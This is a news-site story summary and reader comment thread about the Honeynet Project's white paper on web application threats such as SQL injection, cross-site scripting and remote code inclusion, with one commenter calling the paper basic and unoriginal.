Honeynet Delineates Web Application Threats 40
An anonymous reader sends us to a technical white paper written by the Honeynet Project & Research Alliance: Know Your Enemy: Web Application Threats. Based on analysis of malware collected by the project, the paper outlines a number of HTTP-based attacks against web applications and some ways of protecting Web servers. Included are code injection, remote code-inclusion, SQL injection, cross-site scripting, and exploitation of the PHPShell application.
Hear that understanding? (Score:2, Insightful)
Re:Hear that understanding? (Score:1, Insightful)
But for the other part of
-register globals - 'nuff said
-SQL injection (rather crappy explanation, and an extremely basic one here - there's FAR better articles on this!)
-people not validating stuff before they use it
-XSS
etc.
Along with the same old attacks we've been seeing in server logs for ages (as long as it's updated and secured properly, it shouldn't be a problem), and more of the TOTALLY obvious (blog comment spam? o rly? people creating accounts for phishing? how surprising!)
There's really nothing new here at all. And it's all rather basic. There's nothing to argue over.
If you're a web developer and any of this (basic web app security) is new to you, then your apps shouldn't be exposed to the internet!
I suppose you're right though. We see a lot more comments when it's about the (RI|MP)AA, DRM, GPL, SCO and the like. Kind of sad IMO. Haven't seen too much good articles in the developer section in a while either... Actually, there hasn't been any interesting articles (or comments to mod up) in the last couple days.
Re:Not malware or a bot, but still an attack. (Score:2, Insightful)